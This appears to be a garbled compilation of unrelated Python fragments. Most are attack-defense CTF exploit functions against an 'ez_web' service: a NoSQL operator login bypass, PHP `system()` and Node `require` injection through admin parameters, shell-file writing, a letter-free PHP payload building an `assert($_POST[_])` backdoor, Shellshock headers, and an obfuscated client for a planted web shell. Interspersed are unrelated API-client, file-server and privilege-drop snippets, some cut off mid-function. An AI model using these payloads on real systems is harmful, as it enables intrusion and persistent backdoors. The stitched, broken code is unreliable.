def run_p2p(target, target_port, cmd):
    """Trigger the agent by fetching ``agent.php`` under ``shell_path`` on the target.

    The GET request (sent with the module-level ``headers``) is the only real
    side effect.  ``cmd`` is accepted for interface compatibility but is NOT
    executed: the ``create_p2p`` call that would have used it is disabled, and
    the function hands back a fixed marker command instead.

    Args:
        target: host the request is sent to.
        target_port: port on ``target``.
        cmd: ignored (see above).

    Returns:
        The literal string ``';echo "visit agent.php "'``, after passing it
        to ``debug_print``.
    """
    # create_p2p(target, target_port, cmd) is deliberately not called here.
    agent_url = shell_path + 'agent.php'
    http("get", target, target_port, agent_url, '', headers)
    marker = ';echo "visit agent.php "'
    debug_print(marker)
    return marker
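def login(target):
    """Obtain an admin session on ``target`` via a NoSQL-operator login bypass.

    All requests go through the module-level ``http`` helper on ``target_port``:

    1. GET ``/ez_web/admin/index.php`` and cut the ``PHPSESSID=...`` cookie
       out of the raw response (from ``PHPSESSID=`` up to the ``path``
       attribute of the Set-Cookie header).
    2. GET ``/ez_web/cgi-bin/proxy.cgi`` with
       ``uname[$ne]=666&passwd[$ne]=123456``.  PHP turns ``x[$ne]`` into an
       array; a backend that forwards that to MongoDB unfiltered presumably
       compares with ``$ne`` instead of equality and matches any user.
    3. If the reply contains ``success`` the cookie is now an authenticated
       session and is returned.

    Args:
        target: host to log in to.

    Returns:
        The cookie string on success, otherwise False.  A response that
        carries no ``PHPSESSID`` cookie yields False rather than a garbage
        slice (``str.find`` returns -1 on a miss, which must not be sliced).
    """
    res = http("get", target, target_port, "/ez_web/admin/index.php", "", {})
    pos_1 = res.find("PHPSESSID=")
    # Look for the cookie-path attribute only after the cookie name; a "path"
    # earlier in the response would otherwise produce an empty/garbage slice.
    pos_2 = res.find("path", pos_1) if pos_1 != -1 else -1
    if pos_1 == -1 or pos_2 == -1:
        return False
    cookie = res[pos_1:pos_2]
    print(cookie)
    data = "uname[$ne]=666&passwd[$ne]=123456&target=login.cgi"
    res = http("get", target, target_port, "/ez_web/cgi-bin/proxy.cgi?" + data,
               "", {"Cookie": cookie})
    if "success" in res:
        return cookie
    return False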
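 def __init__(self, connection):
     """Bind this resource to the ``streams`` endpoint of an API client.

     Args:
         connection: mapping with ``base_url``, ``api_key`` and ``debug_mode``
             keys, passed straight to the ``http`` client class.  A missing
             key raises KeyError.

     Side effects:
         Sets ``self.uri``, ``self.http`` (the client *instance*, never the
         ``http`` class itself) and ``self.stream`` (initially None).
     """
     self.uri = "streams"
     self.http = http(url=connection["base_url"],
                      api_key=connection["api_key"],
                      debug_mode=connection["debug_mode"])
     self.stream = None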
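def create_http():
    """Build the ``http`` request object described by the CLI ``args``.

    Reads the module-level ``args`` namespace: ``URL``, ``which`` (request
    type, e.g. ``"post"``), ``verbose``, ``headers`` (list of ``Name:Value``
    strings), ``data`` and ``file``.

    Returns:
        The configured ``http`` instance, after ``constructContent()``.

    Raises:
        OSError: if ``args.file`` is set but cannot be read.
    """
    h = http(args.URL)
    h.setType(args.which)
    if args.verbose:
        h.setVerbosity(True)
    for name, value in _parse_header_args(args.headers):
        h.addHeader(name, value)
    if args.which == "post":
        if args.data:
            # JSON-encode whatever argparse collected for the data option.
            _attach_body(h, json.dumps(args.data), h.setData)
        if args.file:
            with open(args.file, 'r') as f:
                body = f.read()
            _attach_body(h, body, h.setFile)
    h.constructContent()
    return h


def _parse_header_args(raw_headers):
    """Yield ``(name, value)`` pairs from ``Name:Value`` CLI strings.

    Splits on the FIRST colon only, so values that contain a colon themselves
    (``Host:example.com:8080``, a URL in ``Referer``) are kept instead of
    being silently dropped.  Surrounding whitespace is stripped from both
    parts; entries without a colon are ignored.
    """
    for head in raw_headers or []:
        name, sep, value = head.partition(":")
        if sep:
            yield name.strip(), value.strip()


def _attach_body(h, body, setter):
    """Install ``body`` on ``h`` through ``setter`` and add the content headers.

    ``Content-Type`` defaults to ``application/json`` unless the user supplied
    one.  ``Content-Length`` is ``len(body)``, i.e. a character count;
    NOTE(review): this undercounts non-ASCII bodies if the ``http`` class
    sends them UTF-8 encoded — confirm how it encodes before changing.
    """
    setter(body)
    if "Content-Type" not in h.header.keys():
        h.addHeader("Content-Type", "application/json")
    h.addHeader("Content-Length", str(len(body)))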
def post_flag(flag):
    """Submit ``flag`` to the scoreboard at ``flag_server:flag_port`` ``flag_url``.

    Spaces and newlines are stripped from ``flag`` first.  The flag and the
    module-level ``flag_token`` are sent as a raw ``flag=...&token=...`` body
    with the shared ``headers``; neither value is URL-encoded, so a flag
    containing ``&`` or ``+`` would be mangled.

    Returns:
        False if the POST raised (after ``dump_error``); otherwise None — the
        server reply is not inspected.
    """
    cleaned = flag.replace(" ", "").replace("\n", "")
    try:
        form = "flag=%s&token=%s" % (cleaned, flag_token)
        http("post", flag_server, flag_port, flag_url, form, headers)
    except Exception as e:
        dump_error("flag post error", "flag server", "flag.py post_flag")
        return False
def js_exe(target, filename, cookie):
    """Drive ``/ez_web/admin/count.php?cheat=`` to load ``filename`` as JS.

    The ``cheat`` value ``require('./<filename>').a('sh ./4');1`` is URL-quoted
    with ``quote`` and sent to ``target:target_port`` with ``cookie`` as the
    session cookie.  ``filename`` is spliced into a JS string literal without
    escaping, so it must not contain ``'``.

    Returns:
        False if the request raised (after ``dump_error``); otherwise None —
        the server response is fetched but not returned.
    """
    session = {"Cookie": cookie}
    payload = "require('./" + filename + "').a('sh ./4');1"
    try:
        http("get", target, target_port,
             "/ez_web/admin/count.php?cheat=" + quote(payload), "",
             session)
    except Exception as e:
        dump_error(target, e, "js_exe.py js_exe")
        return False
 def get_upload_token(self, uuid, parent=""):
     """POST ``cloud/get_upload_token`` and return the parsed result.

     The request carries the OAuth ``access_token`` plus the client id and
     client secret read from the ``[jue]`` section of ``self.config``
     (``access_key`` / ``access_secret``), the target ``uuid`` and an
     optional ``parent`` id.  Note that the client secret travels in the
     request parameters on every call.

     Args:
         uuid: identifier of the object an upload token is requested for.
         parent: optional parent identifier (default empty string).

     Returns:
         Whatever ``self.result`` makes of the raw ``http().RawRequest``
         response.
     """
     section = "jue"
     params = {
         "access_token": self.access_token,
         "client_id": self.config.get(section, "access_key"),
         "client_secret": self.config.get(section, "access_secret"),
         "uuid": uuid,
         "parent": parent,
     }
     endpoint = self.config.get(section, "api_resource") + "cloud/get_upload_token"
     raw = http().RawRequest(action=endpoint, method="POST", query=params)
     return self.result(raw)
def post_flag(flag, target):
    """Submit ``flag`` captured from ``target`` to the scoreboard.

    Strips spaces/newlines from ``flag``, sets the ``Cookie`` entry of the
    shared ``headers`` dict to ``flag_cookie`` (this mutates the module-level
    ``headers`` for every later caller) and POSTs
    ``melee_flag=<flag>&token=<flag_token>&melee_ip=<target>`` to
    ``flag_server:flag_port`` ``flag_url``.  Nothing is URL-encoded.

    Returns:
        False if the request raised (after ``dump_error``); otherwise None.
        The reply is only handed to ``debug_print``.
    """
    cleaned = flag.replace(" ", "").replace("\n", "")
    try:
        headers['Cookie'] = flag_cookie
        form = "melee_flag=%s&token=%s&melee_ip=%s" % (cleaned, flag_token, target)
        debug_print(http("post", flag_server, flag_port, flag_url, form, headers))
    except Exception as e:
        dump_error("flag post error", "flag server", "flag.py post_flag")
        return False
    def cloud_add_app_file(self, **file_info):
        """POST ``callback/add_app_file`` with ``file_info`` as form fields.

        The query starts with ``access_token`` and is then overlaid with every
        keyword argument, so a caller-supplied ``access_token`` key wins.  The
        endpoint is ``<api_resource>callback/add_app_file`` from the ``[jue]``
        config section.

        Returns:
            The response text on HTTP 200; None on any other status (the
            failure is silently dropped).
        """
        params = {"access_token": self.access_token}
        params.update(file_info)
        endpoint = self.config.get("jue", "api_resource") + "callback/add_app_file"
        reply = http().RawRequest(action=endpoint, method="POST", query=params)
        if reply["status_code"] != 200:
            return None
        return reply["text"]
def db_admin_attack(target, cmd, cookie):
    """Run ``cmd`` through the ``find`` parameter of ``db_admin.php``.

    ``find`` is sent as ``array(1);system('<cmd>');exit;`` (``cmd`` is
    URL-quoted first), i.e. the parameter is expected to be evaluated as PHP
    on the server.  The request goes to ``/ez_web/admin/db_admin.php`` on
    ``target:target_port`` with ``cookie`` as the session.

    The command is echoed to stdout before sending.  The server reply is
    fetched but never returned; a failed request is reported through
    ``dump_error``.  Returns None in every case.
    """
    session = {"Cookie": cookie}
    print(cmd)
    encoded = quote(cmd)
    url = ("/ez_web/admin/db_admin.php?db=admin&action=listRows"
           "&collection=zzz&find=array(1);system('" + encoded + "');exit;")
    try:
        http("get", target, target_port, url, "", session)
    except Exception as e:
        dump_error(target, "something error happens",
                   "db_admin_attack.py db_admin_attack")
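 def client_credentials(self):
     """Fetch an OAuth2 token with the ``client_credentials`` grant.

     POSTs ``grant_type``, ``client_id`` and ``client_secret`` (the last two
     from the ``[jue]`` config section) to ``<api_oauth>ClientCredentials``.
     On HTTP 200 the raw body is cached under the ``auth`` key of
     ``self.memory`` and ``self.access_token`` is set from the
     ``access_token`` field of the JSON body.

     Returns:
         The raw response text on HTTP 200 — even if it could not be parsed
         or cached; that step is best-effort and only reported on stderr.
         None on any other status.
     """
     query = {
         "grant_type": "client_credentials",
         "client_id": self.config.get("jue", "access_key"),
         "client_secret": self.config.get("jue", "access_secret"),
     }
     response = http().RawRequest(action=self.config.get("jue", "api_oauth")+"ClientCredentials", method="POST", query=query)
     if response["status_code"] != 200:
         return None
     try:
         self.memory.set(key="auth", value=response["text"])
         self.access_token = json.loads(response["text"])["access_token"]
     except Exception as exc:
         # Best-effort caching: keep returning the body, but never use a bare
         # ``except`` here — it would also swallow KeyboardInterrupt/SystemExit.
         import sys
         sys.stderr.write("client_credentials: could not cache token: %s\n" % exc)
     return response["text"]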
def attack(target, target_port, cmd, get_flag):
    """Try the planted shell first, then send the ``?content=`` PHP payload.

    Flow:
      1. If ``check_shell`` reports a shell is in place, run ``cmd`` through
         ``execute_shell``; otherwise only log a warning.
      2. Unconditionally GET ``/?content=<payload>`` on ``target:target_port``
         and print the reply.  The payload is PHP written without letters
         (``%2b`` is a URL-encoded ``+``): starting from one character it
         builds the strings ``ASSERT`` and ``_POST`` by repeated ``++``/``.=``
         and ends with ``$_=$$____;$___($_[_]);``, i.e. ``assert($_POST[_])``
         — an assert-based backdoor that evaluates whatever is later POSTed
         as ``_``.  What the server does with ``content`` (where it is stored
         and how it becomes reachable) is not visible here.

    Args:
        target, target_port: host and port of the victim.
        cmd: command for ``execute_shell``; not used by the fallback request.
        get_flag: accepted for interface compatibility; not read here.

    Returns:
        None.  ``is_vuln``/``flag``/``info``/``reserve`` are assigned but
        never used; ``res`` is only printed.
    """
    is_vuln = 1
    flag = "hello world!"
    info = "success"
    reserve = 0
    if check_shell(target, target_port, ""):
        res = execute_shell(target, target_port, cmd)
    else:
        dump_warning(target, "check_shell failed", "function.py check_shell")
    try:
        # Non-alphanumeric PHP: builds ASSERT and _POST, then assert($_POST[_]).
        res = http(
            'get', target, target_port,
            "/?content=$_='';$_[%2b$_]%2b%2b;$_=$_.'';$__=$_[%2b''];$_=$__;$___=$_;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$____='_';$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$_=$$____;$___($_[_]);",
            '', {})
        print res
    except Exception, e:
        dump_error(target, "attack failed", "sample.py attack")
        res = "error"
def file_write(target, filename, contents, cookie):
    """Write ``contents`` to ``filename`` on the target through the ``cheat`` sink.

    Each element of ``contents`` becomes one GET to
    ``/ez_web/admin/count.php?cheat=<js>`` on ``target:target_port``: the
    first element uses ``require('fs').writeFile(...)`` (truncating), every
    later one ``require('fs').appendFile(...)``.  The JS is URL-quoted, but
    ``filename`` and each chunk are spliced into JS single-quoted literals
    unescaped, so they must not contain ``'``.

    Returns:
        False as soon as one request raises (reported via ``dump_error``;
        the location tag it carries names ``db_admin_attack``, a copy-paste
        artefact); None after the last chunk was sent.
    """
    session = {"Cookie": cookie}
    print("waiting to writes shell...")
    for index, chunk in enumerate(contents):
        writer = "writeFile" if index == 0 else "appendFile"
        js = "require('fs')." + writer + "('" + filename + "','" + chunk + "');1"
        try:
            http("get", target, target_port,
                 "/ez_web/admin/count.php?cheat=" + quote(js), "",
                 session)
        except Exception as e:
            dump_error(target, "something error happens",
                       "db_admin_attack.py db_admin_attack")
            return False
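 def secret_portal(self, uid, cfrom="cloud.jue.so", token=""):
     """POST ``secret/portal`` for ``uid`` and return the user record.

     Sends ``access_token``, the client id/secret from the ``[jue]`` config
     section, ``uid``, ``from`` (``cfrom``) and ``token``.  When no ``token``
     is given the MD5 hex digest of the string ``"."`` is sent instead — a
     constant, not a secret; presumably a placeholder the server ignores
     (TODO confirm).

     On HTTP 200 the JSON body's ``data`` member is cached under ``userinfo``
     in ``self.memory`` and returned; if the body cannot be parsed or has no
     ``data``, the raw text is returned instead of raising.

     Returns:
         ``data`` (or the raw response text when ``data`` is missing/falsy)
         on HTTP 200; None on any other status.
     """
     query = {
         "access_token": self.access_token,
         "client_id": self.config.get("jue", "access_key"),
         "client_secret": self.config.get("jue", "access_secret"),
         "uid":  uid,
         "from": cfrom,
         "token": token or hashlib.md5(".").hexdigest()
     }
     response = http().RawRequest(action=self.config.get("jue", "api_resource")+"secret/portal", method="POST", query=query)
     if response["status_code"] != 200:
         return None
     data = None
     try:
         data = json.loads(response["text"])["data"]
         self.memory.set("userinfo", data)
     except Exception:
         # Best-effort parse/cache: fall back to the raw body below instead of
         # letting an unbound ``user_info`` or a KeyError escape.
         pass
     return data or response["text"]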
def execute_shell(target, target_port, cmd):
    """Run ``cmd`` through the planted PHP shell on ``target``.

    Only acts when the module-level ``shell_type`` is 1 or 2; for any other
    value it returns None without sending anything.

    Shell location and auth are derived from the target: the file is
    ``.<md5(shell_salt + target)>.php`` under ``shell_path`` and the ``hash``
    field is ``md5(shell_salt_2 + target)``.  The function name (``system``)
    and the command (``cmd`` + ``;``) are each base64-encoded, then ROT13'd via
    ``rot13``, with ``+`` escaped as ``%2B`` so the form body survives URL
    decoding.  The body ``a=<fn>&b=<cmd>&hash=<hash>`` is POSTed with the
    shared ``headers``.

    Returns:
        The raw response; the string ``"error occurs"`` if the request
        raised (after ``dump_error``); None when ``shell_type`` is not 1/2.
    """
    if shell_type not in (1, 2):
        return None
    shell_name = "." + hashlib.md5(shell_salt + target).hexdigest() + ".php"
    shell_arg = hashlib.md5(shell_salt_2 + target).hexdigest()

    def obfuscate(text):
        # base64 -> rot13, then escape '+' for the form body.
        return rot13(base64.b64encode(text)).replace('+', '%2B')

    form = ("a=" + obfuscate("system") + "&b=" + obfuscate(cmd + ";")
            + "&hash=" + shell_arg)
    debug_print("payload => " + form)
    try:
        return http("post", target, target_port,
                    shell_path + "/" + shell_name, form, headers)
    except Exception as e:
        dump_error(e, target, "function.py execute_shell")
        return "error occurs"
def execute_shell(target, target_port, cmd):
    """Run ``cmd`` through the planted PHP shell on ``target``.

    ``shell_hash`` supplies the shell file name and the ``hash`` credential
    for this target.  Only acts when the module-level ``shell_type`` is 1 or
    2; otherwise returns None without sending anything.

    The function name (``system``) and the command (``cmd`` + ``;``) are each
    base64-encoded, ROT13'd via ``rot13`` and have ``+`` escaped as ``%2B``;
    the body ``a=<fn>&b=<cmd>&hash=<hash>`` is POSTed to
    ``shell_path/<shell_name>`` with the shared ``headers``.

    Returns:
        The raw response on success; ``"timeout"`` when the request raised
        and the error text mentions ``timed out`` or ``Connection refused``;
        ``"error occurs"`` for any other exception (all after ``dump_error``);
        None when ``shell_type`` is not 1/2.
    """
    shell_name, shell_arg = shell_hash(target, target_port)
    if shell_type not in (1, 2):
        return None

    def obfuscate(text):
        # base64 -> rot13, then escape '+' for the form body.
        return rot13(base64.b64encode(text)).replace('+', '%2B')

    form = ("a=" + obfuscate("system") + "&b=" + obfuscate(cmd + ";")
            + "&hash=" + shell_arg)
    debug_print("payload => " + form)
    try:
        return http("post", target, target_port,
                    shell_path + "/" + shell_name, form, headers)
    except Exception as e:
        dump_error(e, target, "function.py execute_shell")
        reason = str(e)
        # Network-level failures are reported distinctly from shell errors.
        if 'timed out' in reason or 'Connection refused' in reason:
            return "timeout"
        return "error occurs"
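def attack(target, cmd, get_flag):
    """Run ``cmd`` on ``target``: via the planted shell, else via Shellshock.

    If ``check_shell`` finds the shell, ``cmd`` goes through ``execute_shell``.
    Otherwise a GET is sent to ``/ez_web/cgi-bin/skin_api.cgi`` on
    ``target:target_port`` with ``User-Agent: () { :; }; <cmd>`` — the
    Shellshock (CVE-2014-6271) pattern, where a vulnerable bash executes the
    text after the function definition when the CGI imports its environment.
    A reply that does not contain ``500`` is logged as "not vulnerable" (the
    injected command typically breaks the CGI's output, which surfaces as a
    500).

    Args:
        target: victim host.
        cmd: shell command.
        get_flag: accepted but not used here.

    Returns:
        None.  Results are only logged; ``is_vuln``/``flag``/``info``/
        ``reserve`` are placeholders.
    """
    is_vuln = 1
    flag = "hello world!"
    info = "success"
    reserve = 0

    if check_shell(target, ""):
        res = execute_shell(target, cmd)
        return
    dump_warning(target, "check_shell failed", "function.py check_shell")
    # Shellshock payload: bash evaluates the trailing command while importing
    # the function definition from the environment.
    header = {"User-Agent": "() { :; }; " + cmd}
    # Initialised so the check below cannot hit an unbound name when the
    # request raises; an absent reply is treated as "not vulnerable".
    res = ""
    try:
        res = http("get", target, target_port,
                   "/ez_web/cgi-bin/skin_api.cgi", "", header)
    except Exception as e:
        print(e)
    if "500" not in res:
        dump_error(target, "not vulnerable", "1.py bashshock")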
        res = http(
            'get', target, target_port,
            "/?content=$_='';$_[%2b$_]%2b%2b;$_=$_.'';$__=$_[%2b''];$_=$__;$___=$_;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$____='_';$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$_=$$____;$___($_[_]);",
            '', {})
        print res
    except Exception, e:
        dump_error(target, "attack failed", "sample.py attack")
        res = "error"

    index_1 = res.find("href='") + 6
    index_2 = res.find("'>shell")
    shell_url = "/" + res[index_1:index_2]
    print "[*]shell_url => " + shell_url
    try:
        data = "_=system('" + cmd + "')"
        res = http("post", target, target_port, shell_url, data, {})
        print len(res)
    except Exception, e:
        dump_error(target, "attack failed", "sample.py attack")
        res = "error"
    if get_flag:
        if check_flag(res):
            flag = res
            print "flag => " + res.replace(" ", "").replace("\n", "")
        else:
            dump_warning(
                target, "flag format error,you may need to rewrite the shell",
                "sample.py attack")
    elif res == "error":
        pass
    else:
 def __init__(self, url, nodetype):
     """Create the ``http`` handler for ``url`` and scrape it immediately.

     ``self.handler`` is an ``http`` object for ``url``; ``self.nodetype``
     records the caller's node type; ``self.__scrapedata()`` (defined on the
     class, not visible here) runs last, so the instance is populated before
     ``__init__`` returns.
     """
     handler = http(url)
     self.handler = handler
     self.nodetype = nodetype
     self.__scrapedata()
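 def __init__(self, connection):
     """Bind this resource to the ``patterns`` endpoint of an API client.

     Args:
         connection: mapping with ``base_url``, ``api_key`` and ``debug_mode``
             keys, passed straight to the ``http`` client class.  A missing
             key raises KeyError.

     Side effects:
         Sets ``self.uri`` and ``self.http`` (the client *instance*, never
         the ``http`` class itself).
     """
     self.uri = "patterns"
     self.http = http(url=connection["base_url"],
                      api_key=connection["api_key"],
                      debug_mode=connection["debug_mode"])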
else:
    import pwd
    config.uid = pwd.getpwnam(config.uid)[2]
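if config.gid.isdigit():
    config.gid = int(config.gid)
else:
    # Resolve a group name to its numeric gid.
    import grp
    config.gid = grp.getgrnam(config.gid)[2]

#load all our components
# Components are built while still privileged (they may need to bind
# sockets or open devices); everything after the drop below runs unprivileged.
import device
scanners = device.scanners(config)
import control
notify = control.control(config, scanners)
import http
webserver = http.http(config, scanners)

#drop our privileges n stuff
# 0o77: files we create are owner-only.
os.umask(0o77)
# setgid()/setuid() alone leave the supplementary groups of the privileged
# process in place, so clear them first (only root may call setgroups).
if hasattr(os, 'setgroups') and os.geteuid() == 0:
    os.setgroups([])
# Group before user: once the uid is dropped, setgid() would no longer be
# permitted.  Both calls raise OSError if the switch fails.
os.setgid(config.gid)
os.setuid(config.uid)

#let's spawn everything we need
# Daemon threads so the listeners die with the main thread.
t = threading.Thread(target = notify.serve_forever, name = 'Control')
t.setDaemon(True)
t.start()
t = threading.Thread(target = webserver.serve_forever, name = 'Webserver')
t.setDaemon(True)
t.start()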

#signal handler
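def handle_client(conn, addr, dir):
    """Serve one HTTP request on ``conn`` from the directory ``dir``.

    Reads a single request (``conn.recvall()`` in ARQ mode, else one
    ``recv(2048)``), parses it with ``parseRequest`` and answers with an
    ``http`` response object:

    * ``GET <path>/``  -> JSON list of the directory's entries.
    * ``GET <path>``   -> the file's bytes with a libmagic MIME type and a
      ``Content-disposition`` header (copied from the request header if
      present, ``inline`` if ``inline`` occurs in the query, else
      ``attachment``); 404 when the file is missing.
    * ``POST <path>``  -> appends ``body`` plus a newline to the file,
      creating parent directories, under a ``LockFile``; 200 on success.
    * anything else    -> 400.

    Paths come straight from the wire, so two guards apply: a literal ``..``
    anywhere in the request path is rejected, and the joined path is resolved
    with ``os.path.realpath`` and must still lie inside ``dir`` (this also
    stops symlinks and any ``..`` that an encoding quirk in ``parseRequest``
    might let through).  POST still lets any client append to any file under
    ``dir``; there is no authentication.

    The connection is always closed in ``finally``.  A request that is not
    valid UTF-8 is answered with 400 instead of dropping the connection.
    Exactly one request is served per connection.

    Args:
        conn: socket-like object with ``recv``/``recvall``/``sendall``/``close``.
        addr: peer address, only used for debug output.
        dir: root directory to serve.  A trailing ``/`` is added if missing.
    """
    if args.debugging:
        print('Handle New client from', addr)
    try:
        if args.arq:
            raw = conn.recvall()
        else:
            raw = conn.recv(2048)
        try:
            data = raw.decode("utf-8")
        except UnicodeDecodeError:
            r = http(400, "Bad request".encode("ascii"))
            r.setContent("Request is not valid UTF-8".encode("ascii"))
            _send_response(conn, r)
            return
        if not data:
            return
        (method, path, query, body, headers) = parseRequest(data)
        if args.debugging:
            print(method, path, body, headers)
        if not dir.endswith("/"):
            dir = dir + "/"
        full_path = _resolve_under_root(dir, path)
        if full_path is None:
            if args.debugging:
                print("Access Denied", path)
            r = http(400, "Access Denied".encode("ascii"))
            r.setContent(
                "You are not allowed to access the files in this folder!".
                encode("ascii"))
        elif method == "GET":
            r = _handle_get(full_path, query, headers)
        elif method == "POST":
            r = _handle_post(full_path, body)
        else:
            r = http(400, "")
        if args.debugging:
            print(r.headToString())
        _send_response(conn, r)
    finally:
        conn.close()


def _resolve_under_root(root, request_path):
    """Join ``request_path`` onto ``root``; None if it would escape ``root``.

    ``root`` must end with ``/``.  The join is ``(root + path)`` with ``//``
    collapsed, so the result keeps a trailing ``/`` for directory requests.
    Rejects any literal ``..`` and any path whose ``realpath`` is not the
    root itself or inside ``realpath(root)``.
    """
    if ".." in request_path:
        return None
    joined = (root + request_path).replace("//", "/")
    real_root = os.path.realpath(root)
    real_path = os.path.realpath(joined)
    # os.path.join(x, "") yields "x/" (and "/" stays "/"), giving a safe prefix.
    if real_path != real_root and not real_path.startswith(os.path.join(real_root, "")):
        return None
    return joined


def _disposition_for(query, headers):
    """Return the Content-disposition value: client header, ``inline``, or ``attachment``.

    CR/LF are stripped from a client-supplied value so it cannot smuggle
    additional response headers.
    """
    if "Content-disposition" in headers:
        value = headers["Content-disposition"]
        return value.replace("\r", "").replace("\n", "")
    if "inline" in query:
        return "inline"
    return "attachment"


def _handle_get(path, query, headers):
    """Build the GET response: a JSON directory listing or the file's bytes."""
    try:
        if path.endswith("/"):
            if args.debugging:
                print("GET Directory", path)
            files = os.listdir(path)
            r = http(200, json.dumps(files).encode("ascii"))
            r.addHeader("Content-Type", "application/json")
            return r
        if not os.path.exists(path):
            r = http(404, "".encode("ascii"))
            r.setContent("File could not be found!".encode("ascii"))
            return r
        if args.debugging:
            print("FIND File", path)
        r = http(200, "")
        r.addHeader("Content-Type", magic.from_file(path, mime=True))
        # Always serve raw bytes: decoding text files and re-encoding them as
        # ASCII raised UnicodeEncodeError (not OSError) on any non-ASCII file
        # and killed the handler before a response was sent.
        with open(path, 'rb') as f:
            r.setContent(f.read())
        r.addHeader("Content-disposition", _disposition_for(query, headers))
        return r
    except OSError as e:
        if args.debugging:
            print(e)
        return http(400, e.strerror)


def _handle_post(path, body):
    """Append ``body`` + newline to ``path`` under a LockFile; 200 or 400."""
    try:
        if args.debugging:
            print("POST File", path)
        pathlib.Path(os.path.dirname(path)).mkdir(parents=True, exist_ok=True)
        lock = LockFile(path)
        lock.acquire()
        try:
            print(os.path.basename(path), " Content", body)
            with open(path, 'a+') as f:
                f.write(body + "\n")
        finally:
            # Release even when the write raises; otherwise the lock is leaked.
            lock.release()
        r = http(200, "".encode("ascii"))
        r.setContent("Data successfully added!".encode("ascii"))
        return r
    except OSError as e:
        if args.debugging:
            print(e)
        r = http(400, e.strerror)
        r.setContent("Bad request!!!".encode("ascii"))
        return r


def _send_response(conn, r):
    """Send headers then body, honouring the extra ARQ ``sendall`` argument."""
    if args.arq:
        conn.sendall(r.headToString().encode("ascii"), False)
    else:
        conn.sendall(r.headToString().encode("ascii"))
    conn.sendall(r.getBody())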
		scan = ap_scan()
		if options.channel: scan.channel = options.channel
		scan.initialize()
	elif options.ssh:
		util.Msg('Starting SSH server...')
		tmp = ssh()
